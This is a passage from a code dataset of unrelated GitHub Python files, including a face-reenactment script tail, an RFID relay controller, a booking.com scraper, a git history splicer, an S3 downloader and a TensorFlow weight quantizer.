tensor2bgr(out_img_tensor)\n        frame_cropped_bgr = tensor2bgr(target_tensor[0])\n\n        # Render\n        # for point in np.round(frame_landmarks).astype(int):\n        #     cv2.circle(frame_cropped_bgr, (point[0], point[1]), 2, (0, 0, 255), -1)\n        render_img = np.concatenate((source_cropped_bgr, out_img_bgr, frame_cropped_bgr), axis=1)\n        if out_vid is not None:\n            out_vid.write(render_img)\n        if out_vid is None or display:\n            cv2.imshow('render_img', render_img)\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n\n\ndef unnormalize(tensor, mean, std):\n    \"\"\"Unnormalize a tensor image with mean and standard deviation.\n\n    See :class:`~torchvision.transforms.Normalize` for more details.\n\n    Args:\n        tensor (Tensor): Tensor image of size (C, H, W) to be unnormalized.\n        mean (sequence): Sequence of means for each channel.\n        std (sequence): Sequence of standard deviations for each channel.\n\n    Returns:\n        Tensor: Unnormalized Tensor image.\n    \"\"\"\n    for t, m, s in zip(tensor, mean, std):\n        t.mul_(s).add_(m)\n    return tensor\n\n\ndef tensor2bgr(img_tensor):\n    output_img = unnormalize(img_tensor, [0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n    output_img = output_img.squeeze().permute(1, 
2, 0).cpu().numpy()\n    output_img = np.round(output_img[:, :, ::-1] * 255).astype('uint8')\n\n    return output_img\n\n\ndef process_image(fa, img, size=256):\n    detected_faces = fa.face_detector.detect_from_image(img.copy())\n    if len(detected_faces) != 1:\n        return None, None\n\n    preds = fa.get_landmarks(img, detected_faces)\n    landmarks = preds[0]\n    bbox = detected_faces[0][:4]\n\n    # Convert bounding boxes format from [min, max] to [min, size]\n    bbox[2:] = bbox[2:] - bbox[:2] + 1\n\n    return landmarks, bbox\n\n\ndef matrix2angle(R):\n    ''' compute three Euler angles from a Rotation Matrix. Ref: http://www.gregslabaugh.net/publications/euler.pdf\n    Args:\n        R: (3,3). rotation matrix\n    Returns:\n        x: yaw\n        y: pitch\n        z: roll\n    '''\n    # assert(isRotationMatrix(R))\n\n    if R[2, 0] != 1 and R[2, 0] != -1:\n        x = asin(R[2, 0])\n        y = atan2(R[2, 1] / cos(x), R[2, 2] / cos(x))\n        z = atan2(R[1, 0] / cos(x), R[0, 0] / cos(x))\n\n    else: # Gimbal lock\n        z = 0 # can be anything\n        if R[2, 0] == -1:\n            x = np.pi / 2\n            y = z + atan2(R[0, 1], R[0, 2])\n        else:\n            x = -np.pi / 2\n            y = -z + atan2(-R[0, 1], -R[0, 2])\n\n    return x, y, z\n\n\ndef rigid_transform_3d(A, B):\n    assert len(A) == len(B)\n\n    N = A.shape[0] # total points\n\n    centroid_A = np.mean(A, axis=0)\n    centroid_B = np.mean(B, axis=0)\n\n    # centre the points\n    AA = A - np.tile(centroid_A, (N, 1))\n    BB = B - np.tile(centroid_B, (N, 1))\n\n    # dot is matrix multiplication for array\n    H = np.transpose(AA) @ BB\n\n    U, S, Vt = np.linalg.svd(H)\n\n    R = Vt.T @ U.T\n\n    # special reflection case\n    if np.linalg.det(R) < 0:\n        print(\"Reflection detected\")\n        Vt[2, :] *= -1\n        R = Vt.T @ U.T\n\n    t = -R @ centroid_A.T + centroid_B.T\n\n    return R, t\n\n\ndef euler2mat(angles):\n    X = np.eye(3)\n    Y = np.eye(3)\n    Z = np.eye(3)\n\n    x = angles[2]\n    y = angles[1]\n    z = angles[0]\n\n    X[1, 1] = cos(x)\n    X[1, 2] = -sin(x)\n    X[2, 1] = sin(x)\n    X[2, 2] = cos(x)\n\n    Y[0, 0] = cos(y)\n    Y[0, 2] = sin(y)\n    Y[2, 0] = -sin(y)\n    Y[2, 2] = cos(y)\n\n    Z[0, 0] = cos(z)\n    Z[0, 1] = -sin(z)\n    Z[1, 0] = sin(z)\n    Z[1, 1] = cos(z)\n\n    R = Z @ Y @ X\n\n    return R\n\n\ndef interpolate_points(points1, points2, alpha=0.5):\n    R, t = rigid_transform_3d(points1, points2)\n    euler = np.array(matrix2angle(R)) # Yaw, Pitch, Roll\n\n    # Interpolate\n    euler = euler * alpha\n    t = t * alpha\n    R = euler2mat([euler[2], -euler[0], euler[1]])\n\n    out_pts = points1.transpose()\n    out_pts = R @ out_pts\n    translation = np.tile(t, (out_pts.shape[1], 1)).transpose()\n    out_pts += translation\n    out_pts = out_pts.transpose()\n\n    return out_pts\n\n\nif __name__ == \"__main__\":\n    # Parse program arguments\n    import argparse\n    parser = argparse.ArgumentParser('reenactment_stepwise')\n    parser.add_argument('source', metavar='IMAGE',\n                        help='path to source image')\n    parser.add_argument('-t', '--target', type=str, metavar='VIDEO',\n                        help='path to target video')\n    parser.add_argument('-a', '--arch',\n                        default='res_unet_split.MultiScaleResUNet(in_nc=71,out_nc=(3,3),flat_layers=(2,0,2,3),ngf=128)',\n                        help='model architecture object')\n    parser.add_argument('-m', '--model', default='../weights/ijbc_msrunet_256_1_2_reenactment_stepwise_v1.pth',\n                        metavar='PATH', help='path to face reenactment model')\n    parser.add_argument('-pm', '--pose_model', default='../weights/hopenet_robust_alpha1.pth', metavar='PATH',\n                        help='path to face pose model')\n    parser.add_argument('-pt1', '--pil_transforms1', nargs='+', help='first PIL transforms',\n                        default=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n                                 
'landmark_transforms.Pyramids(2)'))\n parser.add_argument('-pt2', '--pil_transforms2', nargs='+', help='second PIL transforms',\n default=('landmark_transforms.FaceAlignCrop(bbox_scale=1.2)', 'landmark_transforms.Resize(256)',\n 'landmark_transforms.Pyramids(2)'))\n parser.add_argument('-tt1', '--tensor_transforms1', nargs='+', help='first tensor transforms',\n default=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'))\n parser.add_argument('-tt2', '--tensor_transforms2', nargs='+', help='second tensor transforms',\n default=('landmark_transforms.ToTensor()',\n 'transforms.Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])'))\n parser.add_argument('-o', '--output', default=None, metavar='PATH',\n help='output video path')\n parser.add_argument('-cs', '--crop_size', default=256, type=int, metavar='N',\n help='crop size of the images')\n parser.add_argument('-d', '--display', action='store_true',\n help='display the rendering')\n args = parser.parse_args()\n main(args.source, args.target, args.arch, args.model, args.pose_model, args.pil_transforms1, args.pil_transforms2,\n args.tensor_transforms1, args.tensor_transforms2, args.output, args.crop_size, args.display)\n","repo_name":"doulujiyao/dafc","sub_path":"inference/reenactment_stepwise.py","file_name":"reenactment_stepwise.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"71433436391","text":"#!/usr/bin/env python\n\n# Here are the connections between the Raspberry Pi Zero v1.1 and the RFID chip and the PowerSwitch Tail\n# 1 / +3V3 to 3.3V\n# 22 / GPIO25 to RST\n# 6 / GND to GND *AND* -in(pwrtail)\n# 21 / SPI MISO / GPIO10 to MISO\n# 19 / SPI MOSI / GPIO9 to MOSI\n# 23 / SPI SCLK / GPIO11 to SCK\n# 24 / SPI CSO / GPIO8 to SDA\n# 3 / 12C1 SDA / GPIO2 to +in(pwrtail)\n\n# Hello GitHub!\n\nimport RPi.GPIO as GPIO\nimport time\nimport SimpleMFRC522\n\nreader = SimpleMFRC522.SimpleMFRC522() \n\nPwr=2 \nPwr_status = 0\nmode = False\n\ntKey = 't111' #Set this string to the current code for the appropriate training\nsKey = 't999'\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(Pwr,GPIO.OUT)\nGPIO.output(Pwr,Pwr_status)\n\ndef relay():\n\tprint(\"relay\")\n\tglobal Pwr_status\n\tPwr_status = not Pwr_status\n\tGPIO.output(Pwr,Pwr_status)\n\ntry:\n\twhile True:\n\t\tif mode:\n\t\t\tid,text = reader.read()\n\t\t\tif not sKey in text:\n\t\t\t\ttext = text.strip()+\",\"+tKey\n\t\t\t\treader.write(text)\n\t\t\trelay()\n\t\t\ttime.sleep(1)\n\t\t\tmode = False\n\t\telse:\n\t\t\tid,text = reader.read()\n\t\t\tif tKey in text:\n\t\t\t\tif sKey in text:\n\t\t\t\t\tmode = True\n\t\t\t\trelay()\n\t\t\t\ttime.sleep(2)\n\t\tprint(id)\n\t\tprint(text)\n\t\tprint(mode)\n\t\t\nexcept KeyboardInterrupt:\n\tGPIO.cleanup()\n","repo_name":"m-wintersteen/power-switch","sub_path":"py/JB.py","file_name":"JB.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"44087205540","text":"import math\n\nMAX = 20 * 52\n\narray = [True for _ in range(MAX + 1)]\n\nfor i in range(2, int(math.sqrt(MAX)) + 1):\n if array[i]:\n j = 2\n while i * j <= MAX:\n array[i * j] = False\n j += 1\ns = input()\nsum = 0\n\nfor i in range(len(s)):\n if 'a' <= s[i] <= 'z':\n sum += (ord(s[i]) - ord('a')) + 1\n else:\n sum += (ord(s[i]) - ord('A') + 27)\nif array[sum]:\n print('It is a prime word.')\nelse:\n print('It is not a prime 
word.')\n","repo_name":"mbkim95/Algorithm","sub_path":"Baekjoon/2153.py","file_name":"2153.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"16014828132","text":"import asyncio\n\nfrom sqlalchemy import select\nfrom sqlalchemy.ext.asyncio import async_sessionmaker\n\nfrom database.db import engine, init_models, BotSettings\n\n\nasync def add_column():\n async_session = async_sessionmaker(engine, expire_on_commit=False)\n async with async_session() as session:\n q = 'select(BotSettings)'\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(init_models())\n loop.run_until_complete(add_column())\n finally:\n loop.close()\n\n","repo_name":"Maniackaa/Userbot-WETH-BTC","sub_path":"database/add_column.py","file_name":"add_column.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34132863140","text":"import os\nimport re\nimport time\nimport requests\nimport datetime\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\nclass fetch_booking_dot_com(object):\n def __init__(self): \n self.output_dir = 'output'\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\"\n }\n self.session = requests.Session()\n self.today = datetime.datetime.today()\n self.tomorrow = self.today + datetime.timedelta(1)\n self.home_url = 'https://www.booking.com/'\n self.offset_value = 0\n self.max_offset = 10\n\n def create_dir(self, dirname):\n \"\"\"Method to create directory\"\"\"\n if not os.path.isdir(dirname):\n print('Creating data directory locally: %s' % dirname)\n os.makedirs(dirname)\n print('Successfully created data directory: %s' % dirname)\n\n def create_url(self, country, lang_code, offset_value, label, sid):\n url = \"https://www.booking.com/searchresults.{lang_code}.html?\"\\\n \"label={label}&sid={sid}&sb=1&src=searchresults&src_elem=sb&\"\\\n \"&ss={country}&dest_type=country&checkin_year={in_year}\"\\\n \"&checkin_month={in_month}&checkin_monthday={in_day}\"\\\n \"&checkout_year={out_year}&checkout_month={out_month}\"\\\n \"&checkout_monthday={out_day}&group_adults={people}\"\\\n \"&group_children=0&no_rooms=1&from_sf=1\"\\\n \"&ac_click_type=b&offset={offset}\"\\\n .format(\n lang_code=lang_code,\n label=label,\n sid=sid,\n country=country.replace(' ', '+'),\n in_year=str(self.today.year),\n in_month=str(self.today.month),\n in_day=str(self.today.day),\n out_year=str(self.tomorrow.year),\n out_month=str(self.tomorrow.month),\n out_day=str(self.tomorrow.day),\n people=2,\n offset=offset_value\n )\n return url\n\n def fetch_page(self, url, fname):\n \"\"\" Fetch booking.com pages.\"\"\"\n page = None\n if os.path.isfile(fname):\n print(\"Reading booking.com page: %s\" % fname)\n with open(fname, 'r', encoding='utf-8') as fh:\n page = fh.read()\n else:\n print(\"Fetching booking.com page: %s\" % url)\n res = self.session.get(url, headers=self.headers)\n if res.status_code == 200:\n page = res.text\n with open(fname, 'w', encoding='utf-8') as fh:\n fh.write(page)\n else:\n print(\n \"Requests module failed.\"\n \"To fetch booking.com page: %s\" % (url)\n )\n time.sleep(5)\n soup = BeautifulSoup(page, 'html.parser')\n soup.prettify()\n return soup\n\n def fetch_hotel_page(self, soup, country, offset_value):\n \"\"\" Fetch hotel details url.\"\"\"\n hotel_links = 
soup.find_all('a', {'class': 'hotel_name_link url'})\n if len(hotel_links) == 0:\n hotel_links = soup.find_all(\n 'a',\n {'class': 'js-sr-hotel-link hotel_name_link url'}\n )\n for page_no, link in enumerate(hotel_links):\n html_file = os.path.join(\n os.getcwd(),\n self.output_dir,\n country,\n '%s_page_%s_hotel_%s.html' % (\n country, offset_value, page_no\n )\n )\n print('>> Looking for %s page %s hotel %s' % (\n country, offset_value, page_no+1)\n )\n hotel_url = \"%s%s\" % (\n \"https://www.booking.com\",\n link.get('href').strip()\n )\n soup = self.fetch_page(hotel_url, html_file)\n self.parse_data(soup, country)\n\n def parse_data(self, soup, country):\n \"\"\"Parse data.\"\"\"\n if soup is not None:\n details = {}\n hotel_name = soup.find('h2', {'id': 'hp_hotel_name'}).text.strip()\n name = hotel_name.split('\\n')\n if len(name) > 1:\n name = name[1]\n else:\n name = hotel_name\n name = name.replace(',', '')\n get_latlng = soup.find('a', {'id': 'hotel_sidebar_static_map'})\n if get_latlng is None:\n get_latlng = soup.find('a', {'id': 'hotel_address'})\n latlng = get_latlng.get('data-atlas-latlng')\n # find address\n address = re.search(\n r'\\\"addressLocality\\\"\\s*:\\s*\\\"(.*?)\\\"',\n str(soup)\n ).group(1)\n address = address.replace(',', '')\n # find city\n city = re.search(\n r\"city_name\\s*:\\s*'(.*?)'\",\n str(soup)\n ).group(1)\n city = city.replace(',', '')\n # find postal code\n postal = re.search(\n r'\\\"postalCode\\\"\\s*:\\s*\\\"(.*?)\\\"',\n str(soup)\n ).group(1)\n postal = postal.replace(' ', '')\n # find country\n country_name = re.search(\n r'\\\"addressCountry\\\"\\s*:\\s*\\\"(.*?)\\\"',\n str(soup)\n ).group(1)\n # store data\n (lat, lng) = latlng.split(',')\n details['lat'] = lat\n details['long'] = lng\n details['name'] = name\n details['street'] = address\n details['city'] = city\n details['postal_code'] = postal\n details['country'] = country_name\n self.data.append(details)\n\n def start_process(self):\n \"\"\"Method to fetch the hotels from booking.com.\"\"\"\n self.create_dir(os.path.join(self.output_dir))\n (homepage, countries) = (None, {})\n print('Fetching booking.com homepage...')\n res = self.session.get(self.home_url, headers=self.headers)\n if res.status_code == 200:\n homepage = res.text\n soup = BeautifulSoup(homepage, 'html.parser')\n soup.prettify()\n # - Collect ISO country code.\n get_country_code = soup.find_all('link', {'rel': 'alternate'})\n # - Collect label land sid\n link_help = soup.find('link', {'rel': 'help'})\n help_link = link_help.get('href')\n label = re.search('label=(.*?);', help_link).group(1)\n sid = re.search('sid=(.*?);', help_link).group(1)\n for link in get_country_code:\n language = link.get('hreflang')\n if language:\n if language == 'th':\n countries['Thailand'] = [language, link.get('title')]\n elif language == 'ar':\n countries['UAE'] = [language, link.get('title')]\n elif language == 'sv':\n countries['Sweden'] = [language, link.get('title')]\n elif language == 'en-gb':\n countries['United Kingdom'] = [language, link.get('title')]\n countries['India'] = [language, link.get('title')]\n \n for country in countries.keys():\n self.data = []\n csv_file = os.path.join(\n os.getcwd(),\n '%s_poi.csv' % country.replace(' ', '_')\n )\n if os.path.isfile(csv_file):\n continue\n print('Started searching hotel for country: %s' % country)\n offset_value = 0 # first page offset.\n lang_code = countries.get(country)[0]\n self.create_dir(os.path.join(self.output_dir, country))\n html_file = os.path.join(\n os.getcwd(),\n 
self.output_dir,\n                country,\n                '%s_page_%s.html' % (country, offset_value)\n            )\n            url = self.create_url(country, lang_code, offset_value, label, sid)\n            res = self.fetch_page(url, html_file)\n            soup = self.fetch_hotel_page(\n                res, country, offset_value\n            )\n            self.parse_data(soup, country)\n            if res.find_all(\n                'li', {'class': 'sr_pagination_item'}\n            ):  # find_all returns a list, so check that it is non-empty\n                offset_max = res.find_all(\n                    'li', {'class': 'sr_pagination_item'}\n                )[-1].get_text().splitlines()[-1]\n                if int(offset_max) > self.max_offset:\n                    self.max_offset = self.max_offset\n                else:\n                    self.max_offset = int(offset_max)\n            for i in range(self.max_offset):\n                offset_value += 25 # next page offset\n                html_file = os.path.join(\n                    os.getcwd(),\n                    self.output_dir,\n                    country,\n                    '%s_page_%s.html' % (country, offset_value)\n                )\n                next_page_url = self.create_url(\n                    country, lang_code, offset_value, label, sid\n                )\n                res = self.fetch_page(next_page_url, html_file)\n                soup = self.fetch_hotel_page(\n                    res, country, offset_value\n                )\n            print('Searching of hotel for country: %s completed.' % (\n                country)\n            )\n            df = pd.DataFrame(self.data)\n            df.to_csv(\"%s_poi.csv\" % (\n                country.replace(' ', '_')),\n                index=False\n            )\n\n\n# - main method\nif __name__ == '__main__':\n    booking = fetch_booking_dot_com()\n    booking.start_process()\n","repo_name":"rahul-gurave127/dev","sub_path":"fetch_booking_dot_com.py","file_name":"fetch_booking_dot_com.py","file_ext":"py","file_size_in_byte":9737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18514604780","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sqlite3\nimport tensorflow as tf\nfrom random import randint\nimport math\nimport keras\nfrom keras.layers import Dense, Activation\nfrom keras.models import Sequential\n\n\ndef av_group(tab,n):\n    s = tab.size\n    new_size = s // n # integer division: the result must be an int to size arrays and ranges\n    ans = np.zeros(new_size)\n    for i in range(new_size):\n        ans[i] = np.mean(tab[i*n:(i+1)*n])\n    return ans\n\nconn = sqlite3.connect('../../vwap.sqlite')\n\ncursor = conn.cursor()\n\n\ncursor.execute(\"SELECT Price,Volume,Time FROM ETHEUR\")\neth = np.array(cursor.fetchall())\neth = eth[:-100000,:]\n\ncursor.execute(\"SELECT Price,Volume,Time FROM XBTEUR\")\nbtc = np.array(cursor.fetchall())\nbtc = btc[:-100000,:]\n\n(size, p) = btc.shape\n# plt.plot(btc[:,2],btc[:,0])\n# plt.show()\nminWindowSize = 5\n\nethPrice= av_group(eth[:,0],minWindowSize)\nbtcPrice= av_group(btc[:,0],minWindowSize)\nsize = ethPrice.size\n\nethLog = np.log(ethPrice[1:]) - np.log(ethPrice[:(size-1)]) \nbtcLog = np.log(btcPrice[1:]) - np.log(btcPrice[:(size-1)]) \nethLog = 1000* ethLog\nbtcLog = 1000* btcLog\n\nwindowSizes=np.array([1,4,20])\nwindowQuantity=np.array([3,3,1])\nnbWindow = windowSizes.size\ninputSize = np.sum(windowQuantity)\nbuf = np.max(windowSizes*windowQuantity)\n\n# Build train set\ndef build_train_set(tab):\n    ans = np.zeros([tab.size-buf,inputSize+1])\n    for i in range(tab.size - buf):\n        nInput = 0\n        inputVector = np.zeros(inputSize)\n        # Loop over window sizes\n        for nW in range(nbWindow):\n            # Loop over the number of window of size windowSizes[nW]\n            for j in range(windowQuantity[nW]):\n                # Final index of the window\n                indexEnd = i + buf - j*windowSizes[nW]\n                windowMean = np.mean(tab[(indexEnd-windowSizes[nW]):indexEnd])\n                inputVector[nInput]=windowMean\n                nInput+=1\n        outputValue=np.mean(tab[(i + buf) : (i + buf + 3)])\n        ans[i,:-1]=inputVector\n        ans[i,inputSize]=outputValue\n    return ans\n\ndef random_batch(train_set, batch_size):\n    (nR, nC) = train_set.shape\n    ans = 
np.zeros([batch_size, nC])\n for i in range(batch_size):\n r= randint(0,nR-1)\n ans[i,:] = train_set[r,:]\n return ans\n\n\neth_train_set = build_train_set(ethLog)\nbtc_train_set = build_train_set(btcLog)\n\ninputSize = 2*inputSize\ntrain_set = np.concatenate((btc_train_set[:,:-1],eth_train_set), axis=1)\n\n","repo_name":"Kraji/lambo","sub_path":"data/build_train_set.py","file_name":"build_train_set.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"1352514978","text":"from datetime import timedelta, tzinfo\r\nimport time as _time\r\n\r\nSTDOFFSET = timedelta(seconds = -_time.timezone)\r\nif _time.daylight:\r\n DSTOFFSET = timedelta(seconds = -_time.altzone)\r\nelse:\r\n DSTOFFSET = STDOFFSET\r\n\r\nDSTDIFF = DSTOFFSET - STDOFFSET\r\nZERO = timedelta(0)\r\n\r\nclass LocalTimezone(tzinfo):\r\n\r\n def utcoffset(self, dt):\r\n if self._isdst(dt):\r\n return DSTOFFSET\r\n else:\r\n return STDOFFSET\r\n\r\n def dst(self, dt):\r\n if self._isdst(dt):\r\n return DSTDIFF\r\n else:\r\n return ZERO\r\n\r\n def tzname(self, dt):\r\n return _time.tzname[self._isdst(dt)]\r\n\r\n def _isdst(self, dt):\r\n tt = (dt.year, dt.month, dt.day,\r\n dt.hour, dt.minute, dt.second,\r\n dt.weekday(), 0, 0)\r\n stamp = _time.mktime(tt)\r\n tt = _time.localtime(stamp)\r\n return tt.tm_isdst > 0\r\n\r\nLocal = LocalTimezone()\r\n\r\ndef tDiff(dt2, dt1):\r\n return (dt2 - dt1) - (Local.dst(dt2) - Local.dst(dt1))\r\n\r\n\r\n","repo_name":"Pavion/tvstreamrecord","sub_path":"timezone.py","file_name":"timezone.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"71"} +{"seq_id":"4742149010","text":"import boto3\r\nimport os\r\n\r\n# fetch credentials from env variables\r\naws_access_key_id = os.environ.get('AWS_ACCESS_KEY_ID')\r\naws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')\r\n\r\n# setup a AWS S3 client/resource\r\ns3 = boto3.resource(\r\n 's3',\r\n aws_access_key_id=aws_access_key_id,\r\n aws_secret_access_key=aws_secret_access_key,\r\n )\r\n\r\n# point the resource at the existing bucket\r\nbucket = s3.Bucket('anyoneai-datasets')\r\n\r\nfiles_download = ['LeaderBoard_Data.zip', 'Leaderboard_Submission_Example.zip',\r\n 'PAKDD-2010 training data.zip', 'PAKDD2010_Leaderboard_Submission_Example.txt',\r\n 'PAKDD2010_Modeling_Data.txt', 'PAKDD2010_Prediction_Data.txt',\r\n 'PAKDD2010_VariablesList.XLS', 'Prediction_Data.zip']\r\n\r\n \r\ndest_directory = 'data'\r\nsource_directory = 'credit-data-2010'\r\n\r\n\r\ndef download_files(list_of_files):\r\n for file in list_of_files:\r\n dest_path = os.path.join(dest_directory, file)\r\n source_path = os.path.join(source_directory, file)\r\n with open(dest_path, 'wb') as data:\r\n bucket.download_fileobj(source_path, data)\r\n \r\ndownload_files(files_download)","repo_name":"maruurrets/Credit_Risk_Analysis","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8301801893","text":"#!/usr/bin/env python\n\nimport re\nimport sys\n\nfrom git_fast_filter import Reset, Commit, FastExportFilter, record_id_rename\nfrom git_fast_filter import fast_export_output, fast_import_input\n\nclass InterleaveRepositories:\n def __init__(self, repo1, repo2, output_dir):\n self.repo1 = repo1\n self.repo2 = repo2\n self.output_dir = output_dir\n\n 
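# commit_map holds commits from the first repo keyed by their message letter, so weave_commit can later splice them between matching commits of the second repo.\n        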
self.commit_map = {}\n self.last_commit = None\n\n def skip_reset(self, reset):\n reset.skip()\n\n def hold_commit(self, commit):\n commit.skip(new_id = commit.id)\n letter = re.match('Commit (.)', commit.message).group(1)\n self.commit_map[letter] = commit\n\n def weave_commit(self, commit):\n letter = re.match('Commit (.)', commit.message).group(1)\n prev_letter = chr(ord(letter)-1)\n\n # Splice in any extra commits needed\n if prev_letter in self.commit_map:\n new_commit = self.commit_map[prev_letter]\n new_commit.from_commit = self.last_commit\n new_commit.dump(self.target.stdin)\n commit.from_commit = new_commit.id\n\n # Dump our commit now\n commit.dump(self.target.stdin)\n\n # Make sure that commits that depended on new_commit.id will now depend\n # on commit.id\n if prev_letter in self.commit_map:\n self.last_commit = commit.id\n record_id_rename(new_commit.id, commit.id)\n\n def run(self):\n self.target = fast_import_input(self.output_dir)\n\n input1 = fast_export_output(self.repo1)\n filter1 = FastExportFilter(reset_callback = lambda r: self.skip_reset(r),\n commit_callback = lambda c: self.hold_commit(c))\n filter1.run(input1.stdout, self.target.stdin)\n\n input2 = fast_export_output(self.repo2)\n filter2 = FastExportFilter(commit_callback = lambda c: self.weave_commit(c))\n filter2.run(input2.stdout, self.target.stdin)\n\n # Wait for git-fast-import to complete (only necessary since we passed\n # file objects to FastExportFilter.run; and even then the worst that\n # happens is git-fast-import completes after this python script does)\n self.target.stdin.close()\n self.target.wait()\n\nsplicer = InterleaveRepositories(sys.argv[1], sys.argv[2], sys.argv[3])\nsplicer.run()\n","repo_name":"maxandersen/jbosstools-gitmigration","sub_path":"git_fast_filter/testcases/splice_repos.py","file_name":"splice_repos.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"71"} +{"seq_id":"28163685801","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\n\nfrom .helpers import is_weight_tensor\nfrom .graph_checker import check_for_grad_ops\nimport mnncompress.common.MNN_compression_pb2 as compress_pb\nimport uuid\nfrom mnncompress.common.log import mnn_logger\nfrom mnncompress.common.helper import get_pipeline_methods\n\n_Weight_Quant_Support_Ops = ['Conv2D', 'DepthwiseConv2dNative', 'MatMul']\n_WQ_Mark_name = \"_ori_weight_MNN_wq_\"\n\ndef strip_wq_ops():\n graph = tf.get_default_graph()\n all_ops = graph.get_operations()\n for op in all_ops:\n if _WQ_Mark_name in op.name:\n ori_op_name = op.name.split(_WQ_Mark_name)[0]\n ori_index = int(op.name.split(_WQ_Mark_name)[1])\n ori_op = graph.get_operation_by_name(ori_op_name)\n ori_op._update_input(ori_index, op.outputs[0])\n\nclass WeightQuantizer(object):\n def __init__(self, graph=None, bits=8, debug_info=False):\n if graph is None:\n self._graph = tf.get_default_graph()\n else:\n self._graph = graph\n self._ops = self._graph.get_operations()\n\n if bits < 2 or bits > 8:\n raise ValueError(\"bits must be in [2, 8]\")\n self._bits = bits\n self._clamp_value = pow(2.0, bits-1) - 1.0\n\n self._all_conv_and_matmul_layers = [l for l in self._ops if l.type in _Weight_Quant_Support_Ops]\n self._debug_info = debug_info\n self._prune_weight_ops = []\n self._mask = {}\n self._all_weight_tensors = []\n self._all_weight_tensor_op_map = {}\n self._fake_quant_weight_ops = []\n self._initialized = False\n self._eps = 1e-9\n 
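# Running totals of weight counts, used to report the effective compression rate when saving.\n        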
self._total_weight_num = 0.0\n        self._remain_weight_num = 0.0\n        self._reported = False # flag checked by save_compress_params before logging\n        self._init_prune_ratios = {}\n        self._find_all_variable_tensors()\n        self._insert_wq_ops()\n\n    def save_compress_params(self, filename, append=False):\n        compress_proto = compress_pb.Pipeline()\n        if append:\n            f = open(filename, 'rb')\n            compress_proto.ParseFromString(f.read())\n\n        compress_proto.version = \"0.0.0\"\n        if compress_proto.mnn_uuid == '':\n            self._guid = str(uuid.uuid4())\n            compress_proto.mnn_uuid = self._guid\n        else:\n            self._guid = compress_proto.mnn_uuid\n\n        if not self._reported:\n            detail = {\"algorithm\": \"WQ\", \"pipeline\": get_pipeline_methods(compress_proto), \"compression_rate\": self._total_weight_num / self._remain_weight_num, \\\n                \"ori_model_size\": self._total_weight_num * 4.0 / 1024.0 / 1024.0, \\\n                \"config\": {\"bits\": self._bits, \"init_prune_ratios\": self._init_prune_ratios}}\n            self._reported = mnn_logger.on_done(\"tensorflow\", self._guid, detail)\n\n        with tf.gfile.Open(filename, mode=\"wb\") as f:\n            f.write(compress_proto.SerializeToString())\n\n        print(\"compress proto saved to:\", filename)\n\n    def _strip_wq_ops(self):\n        for ori_weight_tensor, op_index in self._all_weight_tensor_op_map.items():\n            op = op_index[0]\n            index = op_index[1]\n            op._update_input(index, ori_weight_tensor)\n\n    def init(self, sess):\n        if self._initialized is True:\n            raise RuntimeError(\"you should only initialize weight quantizer once\")\n\n        for v in self._all_weight_tensors:\n            mask = tf.cast(tf.abs(v) > 1e-9, tf.float32)\n            prune_ratio = 1.0 - tf.reduce_mean(mask)\n            self._mask[v] = sess.run(mask)\n            prune_weight_op = tf.assign(v, v * self._mask[v])\n            self._prune_weight_ops.append(prune_weight_op)\n\n            prune_ratio = 1 - np.mean(sess.run(mask))\n            self._init_prune_ratios[v.name] = prune_ratio\n            self._remain_weight_num += self._mask[v].size * (1 - prune_ratio) / (32.0 / self._bits)\n            print(v, \"initial prune ratio:\", prune_ratio)\n        \n        self._initialized = True\n\n    def update(self, sess):\n        if self._initialized is False:\n            raise RuntimeError(\"please initialize the quantizer by 'weight_quantizer.init(sess)', before training the model\")\n        \n        sess.run(self._prune_weight_ops)\n        if self._debug_info:\n            for v in self._all_weight_tensors:\n                weight = sess.run(v)\n                prune_ratio = 1 - np.mean(np.abs(weight) > 1e-9)\n                print(v, \"prune_ratio:\", prune_ratio, \"bits:\", self._bits, \"clamp_value:\", self._clamp_value)\n\n    def _insert_wq_ops(self):\n        grad_ops = check_for_grad_ops(self._graph)\n        if grad_ops:\n            raise ValueError('gradient op found in graph, exiting %s\\nplease invoke with inference graph only. 
